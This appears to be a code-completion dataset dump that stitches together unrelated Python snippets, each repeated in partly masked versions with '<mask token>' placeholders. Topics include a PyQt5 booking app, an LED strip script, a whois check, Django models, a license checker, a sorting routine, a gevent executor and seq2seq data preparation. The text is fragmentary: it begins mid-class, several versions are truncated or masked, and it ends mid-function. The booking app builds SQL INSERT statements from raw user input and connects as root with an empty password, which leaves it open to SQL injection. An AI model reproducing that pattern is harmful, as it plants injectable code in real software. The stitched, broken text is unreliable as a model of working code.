self.bBooking.clicked.connect(self.bookingFunc)
self.show()
def forDaftar(self):
self.close()
super(Ui_Login, self).__init__()
uic.loadUi('daftar.ui', self)
self.dUsername = self.findChild(QtWidgets.QLineEdit, 'username')
self.dPassword = self.findChild(QtWidgets.QLineEdit, 'password')
self.dAlamat = self.findChild(QtWidgets.QLineEdit, 'alamat')
self.dNoTelpU = self.findChild(QtWidgets.QLineEdit, 'notelepon')
self.dDaftarButton = self.findChild(QtWidgets.QPushButton, 'daftar')
self.dDaftarButton.clicked.connect(self.daftarFunc)
self.show()
def daftarFunc(self):
user = self.dUsername.text()
pw = self.dPassword.text()
con = pymysql.connect(db='bookingfutsal', user='root', passwd='',
host='localhost', port=3306, autocommit=True)
cur = con.cursor()
insert = user, pw
sql = 'INSERT INTO admin (username, password) VALUES' + str(insert)
data = cur.execute(sql)
self.close()
self.__init__()
def bookingFunc(self):
nama = self.bNamaPembayar.text()
nominal = self.bNominalDp.text()
con = pymysql.connect(db='bookingfutsal', user='root', passwd='',
host='localhost', port=3306, autocommit=True)
cur = con.cursor()
insert = nama, nominal
sql = 'INSERT INTO pembayaran (atasNama, namaPembayaran) VALUES' + str(
insert)
data = cur.execute(sql)
app = QtWidgets.QApplication(sys.argv)
window = Ui_Login()
app.exec_()
| # This is a sample Python script.
# Press Shift+F10 to execute it or replace it with your code.
# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.
from PyQt5 import QtWidgets, uic
import sys
import pymysql
import mysql.connector
class Ui_Login(QtWidgets.QDialog):
def __init__(self):
super(Ui_Login, self).__init__()
uic.loadUi('login.ui', self)
self.icon = self.findChild(QtWidgets.QLabel, 'ilogin')
self.icon.setStyleSheet("image: url(sorce/roundicon.png)")
self.inputUsername = self.findChild(QtWidgets.QLineEdit, 'username')
self.inputPassword = self.findChild(QtWidgets.QLineEdit, 'password')
self.daftarButton = self.findChild(QtWidgets.QPushButton, 'daftarBtn')
self.daftarButton.clicked.connect(self.forDaftar)
self.loginButton = self.findChild(QtWidgets.QPushButton, 'login_2')
self.loginButton.clicked.connect(self.testButton)
self.show()
def testButton(self):
user = self.inputUsername.text()
pw = self.inputPassword.text()
con = pymysql.connect(db='bookingfutsal',
user='root',
passwd='',
host='localhost',
port=3306,
autocommit=True)
cur = con.cursor()
sql = "SELECT * FROM admin WHERE username=%s AND password=%s"
data = cur.execute(sql, (user, pw))
if(len(cur.fetchall()) > 0):
self.close()
super(Ui_Login, self).__init__()
uic.loadUi('booking.ui', self)
self.gambar = self.findChild(QtWidgets.QLabel, 'piclap')
self.gambar.setStyleSheet("background-image: url(sorce/lp2.jpg)")
self.bNamaPembayar = self.findChild(QtWidgets.QLineEdit, 'namapembayar')
self.bNominalDp = self.findChild(QtWidgets.QLineEdit, 'nominaldp')
self.bBooking = self.findChild(QtWidgets.QPushButton, 'booking')
self.bBooking.clicked.connect(self.bookingFunc)
self.show()
def forDaftar(self):
self.close()
super(Ui_Login, self).__init__()
uic.loadUi('daftar.ui', self)
self.dUsername = self.findChild(QtWidgets.QLineEdit, 'username')
self.dPassword = self.findChild(QtWidgets.QLineEdit, 'password')
self.dAlamat = self.findChild(QtWidgets.QLineEdit, 'alamat')
self.dNoTelpU = self.findChild(QtWidgets.QLineEdit, 'notelepon')
self.dDaftarButton = self.findChild(QtWidgets.QPushButton, 'daftar')
self.dDaftarButton.clicked.connect(self.daftarFunc)
self.show()
def daftarFunc(self):
user = self.dUsername.text()
pw = self.dPassword.text()
con = pymysql.connect(db='bookingfutsal',
user='root',
passwd='',
host='localhost',
port=3306,
autocommit=True)
cur = con.cursor()
insert = (user, pw)
sql = "INSERT INTO admin (username, password) VALUES" + str(insert)
data = cur.execute(sql)
self.close()
self.__init__();
# booking.Ui_Booking().Boking()
# koneksi.Koneksi()
def bookingFunc(self):
nama = self.bNamaPembayar.text()
nominal = self.bNominalDp.text()
con = pymysql.connect(db='bookingfutsal',
user='root',
passwd='',
host='localhost',
port=3306,
autocommit=True)
cur = con.cursor()
insert = (nama, nominal)
sql = "INSERT INTO pembayaran (atasNama, namaPembayaran) VALUES" + str(insert)
data = cur.execute(sql)
app = QtWidgets.QApplication(sys.argv)
window = Ui_Login()
app.exec_() | [
5,
7,
8,
9,
10
] |
684 | 5ff7a3843314dfd3914c5e96164385d61fbe7fa5 | <mask token>
| <mask token>
def setPixel(strip):
for i in range(count):
if i < lightUp:
strip.setPixelColor(i, Color(0, 255, 0))
strip.show()
else:
strip.setPixelColor(i, Color(255, 0, 0))
strip.show()
if __name__ == '__main__':
strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA,
LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL, LED_STRIP)
strip.begin()
setPixel(strip)
| <mask token>
count = int(sys.argv[1])
percent = int(sys.argv[2])
LED_COUNT = count
LED_PIN = 18
LED_FREQ_HZ = 800000
LED_DMA = 5
LED_BRIGHTNESS = 255
LED_INVERT = False
LED_CHANNEL = 0
LED_STRIP = ws.WS2811_STRIP_GRB
lightUp = math.floor(percent / count)
def setPixel(strip):
for i in range(count):
if i < lightUp:
strip.setPixelColor(i, Color(0, 255, 0))
strip.show()
else:
strip.setPixelColor(i, Color(255, 0, 0))
strip.show()
if __name__ == '__main__':
strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA,
LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL, LED_STRIP)
strip.begin()
setPixel(strip)
| import sys
import time
import math
from neopixel import *
count = int(sys.argv[1])
percent = int(sys.argv[2])
LED_COUNT = count
LED_PIN = 18
LED_FREQ_HZ = 800000
LED_DMA = 5
LED_BRIGHTNESS = 255
LED_INVERT = False
LED_CHANNEL = 0
LED_STRIP = ws.WS2811_STRIP_GRB
lightUp = math.floor(percent / count)
def setPixel(strip):
for i in range(count):
if i < lightUp:
strip.setPixelColor(i, Color(0, 255, 0))
strip.show()
else:
strip.setPixelColor(i, Color(255, 0, 0))
strip.show()
if __name__ == '__main__':
strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA,
LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL, LED_STRIP)
strip.begin()
setPixel(strip)
| import sys
import time
import math
from neopixel import *
count = int(sys.argv[1])
percent = int(sys.argv[2])
# LED strip configuration:
LED_COUNT = count # Number of LED pixels.
LED_PIN = 18 # GPIO pin connected to the pixels (must support PWM!).
LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)
LED_DMA = 5 # DMA channel to use for generating signal (try 5)
LED_BRIGHTNESS = 255 # Set to 0 for darkest and 255 for brightest
LED_INVERT = False # True to invert the signal (when using NPN transistor level shift)
LED_CHANNEL = 0
LED_STRIP = ws.WS2811_STRIP_GRB
#LED_STRIP = ws.SK6812W_STRIP
lightUp = math.floor(percent/count)
# Intialize the library (must be called once before other functions).
def setPixel(strip):
for i in range(count):
if(i<lightUp):
strip.setPixelColor(i, Color(0, 255, 0))
strip.show()
else:
strip.setPixelColor(i, Color(255, 0, 0))
strip.show()
if __name__ == '__main__':
strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL, LED_STRIP)
strip.begin()
setPixel(strip)
| [
0,
2,
3,
4,
5
] |
685 | 07d574060ded0d98734b4f184dcba7377b3a5480 | <mask token>
| <mask token>
def age_domain(url):
try:
w = whois.whois(url)
if w:
for l in w.expiration_date:
d1 = datetime.date(l)
print(d1)
for l1 in w.creation_date:
d2 = datetime.date(l1)
print(d2)
diff = (d1 - d2).days
print(diff)
if diff / 30 < 6:
return 1
else:
return 0
except:
return -1
| from datetime import datetime
import whois
def age_domain(url):
try:
w = whois.whois(url)
if w:
for l in w.expiration_date:
d1 = datetime.date(l)
print(d1)
for l1 in w.creation_date:
d2 = datetime.date(l1)
print(d2)
diff = (d1 - d2).days
print(diff)
if diff / 30 < 6:
return 1
else:
return 0
except:
return -1
| from datetime import datetime
import whois
def age_domain(url):
try:
w = whois.whois(url)
if(w):
for l in w.expiration_date:
d1 = datetime.date(l)
print(d1)
for l1 in w.creation_date:
d2 = datetime.date(l1)
print(d2)
diff = (d1 - d2).days
print(diff)
if ((diff / 30) < 6):
return 1
else:
return 0
except:
return -1
| null | [
0,
1,
2,
3
] |
686 | a4db12fee72989f983c1069839dc0a5ede4561a3 | <mask token>
class PraiseHistory(TimeStampedModel):
class Meta:
verbose_name = '칭찬 내역'
verbose_name_plural = verbose_name
praise = models.ForeignKey(Praise, verbose_name='칭찬')
choices = JSONField(verbose_name='칭찬 대상 목록')
sender_key = models.CharField(verbose_name='보낸 사람 user key', max_length=200
)
receiver_key = models.CharField(verbose_name='받은 사람 user key',
max_length=200)
| <mask token>
class Praise(TimeStampedModel):
class Meta:
verbose_name = '칭찬'
verbose_name_plural = verbose_name
<mask token>
class PraiseHistory(TimeStampedModel):
class Meta:
verbose_name = '칭찬 내역'
verbose_name_plural = verbose_name
praise = models.ForeignKey(Praise, verbose_name='칭찬')
choices = JSONField(verbose_name='칭찬 대상 목록')
sender_key = models.CharField(verbose_name='보낸 사람 user key', max_length=200
)
receiver_key = models.CharField(verbose_name='받은 사람 user key',
max_length=200)
| <mask token>
class Praise(TimeStampedModel):
class Meta:
verbose_name = '칭찬'
verbose_name_plural = verbose_name
content = models.CharField(verbose_name='내용', unique=True, max_length=200)
class PraiseHistory(TimeStampedModel):
class Meta:
verbose_name = '칭찬 내역'
verbose_name_plural = verbose_name
praise = models.ForeignKey(Praise, verbose_name='칭찬')
choices = JSONField(verbose_name='칭찬 대상 목록')
sender_key = models.CharField(verbose_name='보낸 사람 user key', max_length=200
)
receiver_key = models.CharField(verbose_name='받은 사람 user key',
max_length=200)
| from django.contrib.postgres.fields import JSONField
from django.db import models
from service.models import TimeStampedModel
class Praise(TimeStampedModel):
class Meta:
verbose_name = '칭찬'
verbose_name_plural = verbose_name
content = models.CharField(verbose_name='내용', unique=True, max_length=200)
class PraiseHistory(TimeStampedModel):
class Meta:
verbose_name = '칭찬 내역'
verbose_name_plural = verbose_name
praise = models.ForeignKey(Praise, verbose_name='칭찬')
choices = JSONField(verbose_name='칭찬 대상 목록')
sender_key = models.CharField(verbose_name='보낸 사람 user key', max_length=200
)
receiver_key = models.CharField(verbose_name='받은 사람 user key',
max_length=200)
| null | [
2,
3,
4,
5
] |
687 | c70aa1a373530ac73553753e62d3989f5bc79287 | <mask token>
class LicenseChecker(object):
<mask token>
<mask token>
<mask token>
<mask token>
| <mask token>
class LicenseChecker(object):
<mask token>
<mask token>
def __updateTimes(self, times):
actual = self.__countTimes()
ff = open('times.ehead', 'w')
ff.write(str(actual - times))
ff.close()
def isActive(self):
try:
site = urllib.urlopen(self.url)
content = site.readlines()
site.close()
except IOError:
if not self.__countTimes() == 0:
self.__updateTimes(1)
return {'active': True, 'msg': 'Ejecutando sin conexion.'}
else:
return {'active': False, 'msg':
'Ejecutado demasiadas veces sin conexion.'}
if content[0].strip() == 'ACTIVE':
self.__updateTimes(self.count_offline)
return {'active': True, 'msg': 'Iniciando Sistema'}
else:
return {'active': False, 'msg': content[0].strip()}
| <mask token>
class LicenseChecker(object):
def __init__(self):
self.url = 'http://logon.guidoaccardo.com.ar/'
self.count_offline = 15
def __countTimes(self):
ff = open('times.ehead', 'r')
bb = ff.read()
ff.close()
return int(bb)
def __updateTimes(self, times):
actual = self.__countTimes()
ff = open('times.ehead', 'w')
ff.write(str(actual - times))
ff.close()
def isActive(self):
try:
site = urllib.urlopen(self.url)
content = site.readlines()
site.close()
except IOError:
if not self.__countTimes() == 0:
self.__updateTimes(1)
return {'active': True, 'msg': 'Ejecutando sin conexion.'}
else:
return {'active': False, 'msg':
'Ejecutado demasiadas veces sin conexion.'}
if content[0].strip() == 'ACTIVE':
self.__updateTimes(self.count_offline)
return {'active': True, 'msg': 'Iniciando Sistema'}
else:
return {'active': False, 'msg': content[0].strip()}
| import urllib
class LicenseChecker(object):
def __init__(self):
self.url = 'http://logon.guidoaccardo.com.ar/'
self.count_offline = 15
def __countTimes(self):
ff = open('times.ehead', 'r')
bb = ff.read()
ff.close()
return int(bb)
def __updateTimes(self, times):
actual = self.__countTimes()
ff = open('times.ehead', 'w')
ff.write(str(actual - times))
ff.close()
def isActive(self):
try:
site = urllib.urlopen(self.url)
content = site.readlines()
site.close()
except IOError:
if not self.__countTimes() == 0:
self.__updateTimes(1)
return {'active': True, 'msg': 'Ejecutando sin conexion.'}
else:
return {'active': False, 'msg':
'Ejecutado demasiadas veces sin conexion.'}
if content[0].strip() == 'ACTIVE':
self.__updateTimes(self.count_offline)
return {'active': True, 'msg': 'Iniciando Sistema'}
else:
return {'active': False, 'msg': content[0].strip()}
| #!/usr/bin/env python
import urllib
class LicenseChecker( object ):
def __init__( self ):
self.url = 'http://logon.guidoaccardo.com.ar/'
self.count_offline = 15
def __countTimes( self ):
ff = open( 'times.ehead', 'r' )
bb = ff.read()
ff.close()
return int( bb )
def __updateTimes( self, times ):
actual = self.__countTimes()
ff = open( 'times.ehead', 'w' )
ff.write( str( actual-times ) )
ff.close()
def isActive( self ):
try:
site = urllib.urlopen( self.url )
content = site.readlines()
site.close()
except IOError:
if not self.__countTimes() == 0:
self.__updateTimes( 1 )
return { 'active':True, 'msg':'Ejecutando sin conexion.' }
else:
return { 'active':False, 'msg':'Ejecutado demasiadas veces sin conexion.' }
if content[0].strip() == 'ACTIVE':
self.__updateTimes( self.count_offline )
return { 'active':True, 'msg':'Iniciando Sistema' }
else:
return { 'active':False, 'msg':content[0].strip() }
| [
1,
3,
5,
6,
7
] |
688 | 8680c033662a89ed6fc73e65ec544b93558c4208 | <mask token>
| <mask token>
def main(args=None):
if args:
slide_show(args[0])
| from .feature import slide_show
def main(args=None):
if args:
slide_show(args[0])
| null | null | [
0,
1,
2
] |
689 | 56892e125934d5de937b92a08bd7707c12c70928 | <mask token>
| def findOrder(numCourses, prerequisites):
if len(prerequisites) == 0:
order = []
for i in range(0, numCourses):
order.append(i)
return order
edges = {}
for prerequisite in prerequisites:
if prerequisite[0] == prerequisite[1]:
return []
if prerequisite[0] not in edges:
edges[prerequisite[0]] = [prerequisite[1]]
else:
v = edges[prerequisite[0]]
v.append(prerequisite[1])
edges[prerequisite[0]] = v
visited = {}
stack = []
order = []
for vertex in edges.keys():
if vertex not in visited:
stack.append(vertex)
visited[vertex] = 1
while len(stack) != 0:
v = stack.pop()
if v not in edges:
order.append(v)
else:
flag = True
stack.append(v)
for u in edges[v]:
if u in visited:
if u in edges and v in edges[u]:
return []
else:
visited[u] = 1
stack.append(u)
flag = False
if flag:
stack.pop()
order.append(v)
for v in range(0, numCourses):
if v not in order:
order.append(v)
return order[::-1]
<mask token>
| def findOrder(numCourses, prerequisites):
if len(prerequisites) == 0:
order = []
for i in range(0, numCourses):
order.append(i)
return order
edges = {}
for prerequisite in prerequisites:
if prerequisite[0] == prerequisite[1]:
return []
if prerequisite[0] not in edges:
edges[prerequisite[0]] = [prerequisite[1]]
else:
v = edges[prerequisite[0]]
v.append(prerequisite[1])
edges[prerequisite[0]] = v
visited = {}
stack = []
order = []
for vertex in edges.keys():
if vertex not in visited:
stack.append(vertex)
visited[vertex] = 1
while len(stack) != 0:
v = stack.pop()
if v not in edges:
order.append(v)
else:
flag = True
stack.append(v)
for u in edges[v]:
if u in visited:
if u in edges and v in edges[u]:
return []
else:
visited[u] = 1
stack.append(u)
flag = False
if flag:
stack.pop()
order.append(v)
for v in range(0, numCourses):
if v not in order:
order.append(v)
return order[::-1]
print(findOrder(2, [[1, 0]]))
| # 4, [[1,0],[2,0],[3,1],[3,2]]
# 3->1->0
# \ ^
# \ |
# \> 2
# 1,0,2,3
# stack 3
#
# 0 1 2 3
# 1,0
# stack 1
# 0
#
# def findOrder(numCourses, prerequisites):
# if len(prerequisites) == 0:
# order = []
# for i in range(0, numCourses):
# order.append(i)
# return order
#
# edges = {}
# for prerequisite in prerequisites:
# if prerequisite[0] not in edges:
# edges[prerequisite[0]] = [prerequisite[1]]
# else:
# v = edges[prerequisite[0]]
# v.append(prerequisite[1])
# edges[prerequisite[0]] = v
#
# visited = {}
# stack = []
# order = []
# while len(edges) != 0:
# edge_u = list(edges.keys())[0]
# if len(stack) == 0:
# if edge_u not in visited:
# stack.append(edge_u)
# visited[edge_u] = 1
# else:
# u = stack[-1]
# flag = True
# if u in edges:
# for v in edges[u]:
# if v not in visited:
# visited[v] = 1
# stack.append(v)
# flag = False
# else:
# if v in edges and u in edges[v]:
# return []
# if flag:
# order.append(u)
# stack.pop()
# if u in edges:
# del edges[u]
#
# for i in range(0, numCourses):
# if i not in order:
# order.append(i)
# return order
def findOrder(numCourses, prerequisites):
if len(prerequisites) == 0:
order = []
for i in range(0, numCourses):
order.append(i)
return order
edges = {}
for prerequisite in prerequisites:
if prerequisite[0] == prerequisite[1]:
return []
if prerequisite[0] not in edges:
edges[prerequisite[0]] = [prerequisite[1]]
else:
v = edges[prerequisite[0]]
v.append(prerequisite[1])
edges[prerequisite[0]] = v
visited = {}
stack = []
order = []
for vertex in edges.keys():
if vertex not in visited:
stack.append(vertex)
visited[vertex] = 1
while len(stack) != 0:
v = stack.pop()
if v not in edges:
order.append(v)
else:
flag = True
stack.append(v)
for u in edges[v]:
if u in visited:
if u in edges and v in edges[u]:
return []
else:
visited[u] = 1
stack.append(u)
flag = False
if flag:
stack.pop()
order.append(v)
for v in range(0, numCourses):
if v not in order:
order.append(v)
return order[::-1]
print(findOrder(2, [[1, 0]]))
# print(findOrder(4, [[1, 0], [2, 0], [3, 1], [3, 2]]))
| null | [
0,
1,
2,
3
] |
690 | efca954e1977a6f6ac9a966b3c84ba80f5b7a663 | <mask token>
| <mask token>
for n in range(N):
counting_list[int(sys.stdin.readline())] += 1
for i, v in enumerate(counting_list):
if v:
sys.stdout.write((str(i) + '\n') * v)
| <mask token>
sys.stdin = open('10989.txt', 'r')
counting_list = [(0) for _ in range(10001)]
N = int(sys.stdin.readline())
for n in range(N):
counting_list[int(sys.stdin.readline())] += 1
for i, v in enumerate(counting_list):
if v:
sys.stdout.write((str(i) + '\n') * v)
| import sys
sys.stdin = open('10989.txt', 'r')
counting_list = [(0) for _ in range(10001)]
N = int(sys.stdin.readline())
for n in range(N):
counting_list[int(sys.stdin.readline())] += 1
for i, v in enumerate(counting_list):
if v:
sys.stdout.write((str(i) + '\n') * v)
| import sys
sys.stdin = open('10989.txt', 'r')
counting_list = [0 for _ in range(10001)]
N = int(sys.stdin.readline())
for n in range(N):
counting_list[int(sys.stdin.readline())] += 1
for i, v in enumerate(counting_list):
if v:
sys.stdout.write((str(i) + '\n') * v)
| [
0,
1,
2,
3,
4
] |
691 | 0709d413ddbe41a0c97f94b7819fdfded241d3fc | <mask token>
class Resources:
<mask token>
def __init__(self, title, author, publisher, year):
self.title = title
self.author = author
self.publisher = publisher
self.year = year
<mask token>
<mask token>
def set_publisher(self, publisher):
"""Method that sets the publisher of a resource object"""
self.publisher = publisher
<mask token>
<mask token>
<mask token>
def get_publisher(self):
"""Method that gets the publisher of a resource object"""
return self.publisher
<mask token>
<mask token>
| <mask token>
class Resources:
<mask token>
def __init__(self, title, author, publisher, year):
self.title = title
self.author = author
self.publisher = publisher
self.year = year
def set_title(self, title):
"""Method that sets the title of a resource object"""
self.title = title
def set_author(self, author):
"""Method that sets the author of a resource object"""
self.author = author
def set_publisher(self, publisher):
"""Method that sets the publisher of a resource object"""
self.publisher = publisher
def set_year(self, year):
"""Method that sets the year of a resource object"""
self.year = year
<mask token>
def get_author(self):
"""Method that gets the author of a resource object"""
return self.author
def get_publisher(self):
"""Method that gets the publisher of a resource object"""
return self.publisher
<mask token>
<mask token>
| <mask token>
class Resources:
<mask token>
def __init__(self, title, author, publisher, year):
self.title = title
self.author = author
self.publisher = publisher
self.year = year
def set_title(self, title):
"""Method that sets the title of a resource object"""
self.title = title
def set_author(self, author):
"""Method that sets the author of a resource object"""
self.author = author
def set_publisher(self, publisher):
"""Method that sets the publisher of a resource object"""
self.publisher = publisher
def set_year(self, year):
"""Method that sets the year of a resource object"""
self.year = year
<mask token>
def get_author(self):
"""Method that gets the author of a resource object"""
return self.author
def get_publisher(self):
"""Method that gets the publisher of a resource object"""
return self.publisher
<mask token>
def get_resource_details(self):
"""Method that returns the main details of a resource object"""
return (
f'[Title:"{self.get_title()}"] [Author:{self.get_author()}] [Publisher:{self.get_publisher()}] [Year:{self.get_year()}]'
)
| <mask token>
class Resources:
<mask token>
def __init__(self, title, author, publisher, year):
self.title = title
self.author = author
self.publisher = publisher
self.year = year
def set_title(self, title):
"""Method that sets the title of a resource object"""
self.title = title
def set_author(self, author):
"""Method that sets the author of a resource object"""
self.author = author
def set_publisher(self, publisher):
"""Method that sets the publisher of a resource object"""
self.publisher = publisher
def set_year(self, year):
"""Method that sets the year of a resource object"""
self.year = year
<mask token>
def get_author(self):
"""Method that gets the author of a resource object"""
return self.author
def get_publisher(self):
"""Method that gets the publisher of a resource object"""
return self.publisher
def get_year(self):
"""Method that gets the year of a resource object"""
return self.year
def get_resource_details(self):
"""Method that returns the main details of a resource object"""
return (
f'[Title:"{self.get_title()}"] [Author:{self.get_author()}] [Publisher:{self.get_publisher()}] [Year:{self.get_year()}]'
)
| # -*- coding: utf-8 -*-
"""
Created on Tue Oct 9 16:22:21 2018
@author: SDis
"""
#import Code.Members_module
class Resources:
""" Parent class for Books and eResources containg the main data fields and related setters and getters"""
def __init__(self, title, author, publisher, year):
self.title = title
self.author = author
self.publisher = publisher
self.year = year
#Setters
def set_title (self, title):
"""Method that sets the title of a resource object"""
self.title = title
def set_author (self, author):
"""Method that sets the author of a resource object"""
self.author = author
def set_publisher (self, publisher):
"""Method that sets the publisher of a resource object"""
self.publisher = publisher
def set_year (self, year):
"""Method that sets the year of a resource object"""
self.year = year
#Getters
def get_title(self):
"""Method that gets the title of a resource object"""
return self.title
def get_author(self):
"""Method that gets the author of a resource object"""
return self.author
def get_publisher(self):
"""Method that gets the publisher of a resource object"""
return self.publisher
def get_year(self):
"""Method that gets the year of a resource object"""
return self.year
def get_resource_details (self):
"""Method that returns the main details of a resource object"""
return (f"[Title:\"{self.get_title()}\"] [Author:{self.get_author()}] [Publisher:{self.get_publisher()}] [Year:{self.get_year()}]")
| [
4,
8,
9,
10,
13
] |
692 | 9156ee034ceb8a39fc1eb3a18c1597c737814c72 | # from django.test import TestCase ,LiveServerTestCase,Client
# from MeetUps.models import*
# from django.shortcuts import reverse
# from .forms import RegistrationForm
# class MeetUpViewTest(TestCase):
# @classmethod
# def setupTestDat(cls):
# #create or get all meetups
# def test_index(request,meetup_slug): | null | null | null | null | [
1
] |
693 | afcadc11d23fb921eb6f8038a908de02ee763ca4 | <mask token>
class GeventExecutor(BaseExecutor):
<mask token>
def _do_submit_job(self, job, run_times):
def callback(greenlet):
try:
events = greenlet.get()
except BaseException:
self._run_job_error(job.id, *sys.exc_info()[1:])
else:
self._run_job_success(job.id, events)
gevent.spawn(run_job, job, job._jobstore_alias, run_times, self.
_logger.name).link(callback)
| <mask token>
class GeventExecutor(BaseExecutor):
"""
Runs jobs as greenlets.
Plugin alias: ``gevent``
"""
def _do_submit_job(self, job, run_times):
def callback(greenlet):
try:
events = greenlet.get()
except BaseException:
self._run_job_error(job.id, *sys.exc_info()[1:])
else:
self._run_job_success(job.id, events)
gevent.spawn(run_job, job, job._jobstore_alias, run_times, self.
_logger.name).link(callback)
| <mask token>
try:
import gevent
except ImportError:
raise ImportError('GeventExecutor requires gevent installed')
class GeventExecutor(BaseExecutor):
"""
Runs jobs as greenlets.
Plugin alias: ``gevent``
"""
def _do_submit_job(self, job, run_times):
def callback(greenlet):
try:
events = greenlet.get()
except BaseException:
self._run_job_error(job.id, *sys.exc_info()[1:])
else:
self._run_job_success(job.id, events)
gevent.spawn(run_job, job, job._jobstore_alias, run_times, self.
_logger.name).link(callback)
| from __future__ import absolute_import
import sys
from apscheduler.executors.base import BaseExecutor, run_job
try:
import gevent
except ImportError:
raise ImportError('GeventExecutor requires gevent installed')
class GeventExecutor(BaseExecutor):
"""
Runs jobs as greenlets.
Plugin alias: ``gevent``
"""
def _do_submit_job(self, job, run_times):
def callback(greenlet):
try:
events = greenlet.get()
except BaseException:
self._run_job_error(job.id, *sys.exc_info()[1:])
else:
self._run_job_success(job.id, events)
gevent.spawn(run_job, job, job._jobstore_alias, run_times, self.
_logger.name).link(callback)
| from __future__ import absolute_import
import sys
from apscheduler.executors.base import BaseExecutor, run_job
try:
import gevent
except ImportError: # pragma: nocover
raise ImportError('GeventExecutor requires gevent installed')
class GeventExecutor(BaseExecutor):
"""
Runs jobs as greenlets.
Plugin alias: ``gevent``
"""
def _do_submit_job(self, job, run_times):
def callback(greenlet):
try:
events = greenlet.get()
except BaseException:
self._run_job_error(job.id, *sys.exc_info()[1:])
else:
self._run_job_success(job.id, events)
gevent.spawn(run_job, job, job._jobstore_alias, run_times, self._logger.name).\
link(callback)
| [
2,
3,
4,
5,
6
] |
694 | bf51da12632013c62aa543ae7f02415057138c7a | <mask token>
def get_qa_set(directory, jsonl_file):
"""Download the WMT en-fr training corpus to directory unless it's there."""
set_name = os.path.splitext(os.path.basename(jsonl_file))[0]
set_path = os.path.join(directory, set_name)
src_path = set_path + '.src'
targ_path = set_path + '.targ'
if gfile.Exists(src_path) and gfile.Exists(targ_path):
return set_path
with open(jsonl_file, 'r') as qafile, open(src_path, 'w') as srcfile, open(
targ_path, 'w') as targfile:
for line in qafile:
lcontent = json.loads(line)
srcfile.write(lcontent['q'].replace('\n', '') + '\n')
targfile.write(lcontent['a'].replace('\n', '') + '\n')
return set_path
<mask token>
def prepare_jsonlbpe_data(data_dir, train_data_file, dev_data_file, vocab_file
):
"""Get WMT data into data_dir, create vocabularies and tokenize data.
Args:
data_dir: directory in which the data sets will be stored.
train_data_file: jsonl data file.
dev_data_file: jsonl data file.
vocab_file: bpe json vocab
Returns:
A tuple of 6 elements:
(1) path to the token-ids for src training data-set,
(2) path to the token-ids for target training data-set,
(3) path to the token-ids for src development data-set,
(4) path to the token-ids for src development data-set,
(5) path to the src vocabulary file,
(6) path to the src vocabulary file.
"""
if not gfile.Exists(data_dir):
gfile.MkDir(data_dir)
train_path = get_qa_set(data_dir, train_data_file)
dev_path = get_qa_set(data_dir, dev_data_file)
vocab_path = os.path.join(data_dir, 'vocab.txt')
create_vocabulary(vocab_path, vocab_file)
src_train_ids_path = train_path + '.src.ids'
targ_train_ids_path = train_path + '.targ.ids'
data_to_token_ids(train_path + '.src', src_train_ids_path, vocab_path)
data_to_token_ids(train_path + '.targ', targ_train_ids_path, vocab_path)
src_dev_ids_path = dev_path + '.src.ids'
targ_dev_ids_path = dev_path + '.targ.ids'
data_to_token_ids(dev_path + '.src', src_dev_ids_path, vocab_path)
data_to_token_ids(dev_path + '.targ', targ_dev_ids_path, vocab_path)
return (src_train_ids_path, targ_train_ids_path, src_dev_ids_path,
targ_dev_ids_path, vocab_path)
| <mask token>
def get_qa_set(directory, jsonl_file):
"""Download the WMT en-fr training corpus to directory unless it's there."""
set_name = os.path.splitext(os.path.basename(jsonl_file))[0]
set_path = os.path.join(directory, set_name)
src_path = set_path + '.src'
targ_path = set_path + '.targ'
if gfile.Exists(src_path) and gfile.Exists(targ_path):
return set_path
with open(jsonl_file, 'r') as qafile, open(src_path, 'w') as srcfile, open(
targ_path, 'w') as targfile:
for line in qafile:
lcontent = json.loads(line)
srcfile.write(lcontent['q'].replace('\n', '') + '\n')
targfile.write(lcontent['a'].replace('\n', '') + '\n')
return set_path
def basic_tokenizer(sentence):
"""Very basic tokenizer: split the sentence into a list of tokens."""
words = []
for space_separated_fragment in sentence.strip().split():
words.extend(_WORD_SPLIT.split(space_separated_fragment))
return [w for w in words if w]
<mask token>
def prepare_jsonlbpe_data(data_dir, train_data_file, dev_data_file, vocab_file
):
"""Get WMT data into data_dir, create vocabularies and tokenize data.
Args:
data_dir: directory in which the data sets will be stored.
train_data_file: jsonl data file.
dev_data_file: jsonl data file.
vocab_file: bpe json vocab
Returns:
A tuple of 6 elements:
(1) path to the token-ids for src training data-set,
(2) path to the token-ids for target training data-set,
(3) path to the token-ids for src development data-set,
(4) path to the token-ids for src development data-set,
(5) path to the src vocabulary file,
(6) path to the src vocabulary file.
"""
if not gfile.Exists(data_dir):
gfile.MkDir(data_dir)
train_path = get_qa_set(data_dir, train_data_file)
dev_path = get_qa_set(data_dir, dev_data_file)
vocab_path = os.path.join(data_dir, 'vocab.txt')
create_vocabulary(vocab_path, vocab_file)
src_train_ids_path = train_path + '.src.ids'
targ_train_ids_path = train_path + '.targ.ids'
data_to_token_ids(train_path + '.src', src_train_ids_path, vocab_path)
data_to_token_ids(train_path + '.targ', targ_train_ids_path, vocab_path)
src_dev_ids_path = dev_path + '.src.ids'
targ_dev_ids_path = dev_path + '.targ.ids'
data_to_token_ids(dev_path + '.src', src_dev_ids_path, vocab_path)
data_to_token_ids(dev_path + '.targ', targ_dev_ids_path, vocab_path)
return (src_train_ids_path, targ_train_ids_path, src_dev_ids_path,
targ_dev_ids_path, vocab_path)
| <mask token>
def get_qa_set(directory, jsonl_file):
"""Download the WMT en-fr training corpus to directory unless it's there."""
set_name = os.path.splitext(os.path.basename(jsonl_file))[0]
set_path = os.path.join(directory, set_name)
src_path = set_path + '.src'
targ_path = set_path + '.targ'
if gfile.Exists(src_path) and gfile.Exists(targ_path):
return set_path
with open(jsonl_file, 'r') as qafile, open(src_path, 'w') as srcfile, open(
targ_path, 'w') as targfile:
for line in qafile:
lcontent = json.loads(line)
srcfile.write(lcontent['q'].replace('\n', '') + '\n')
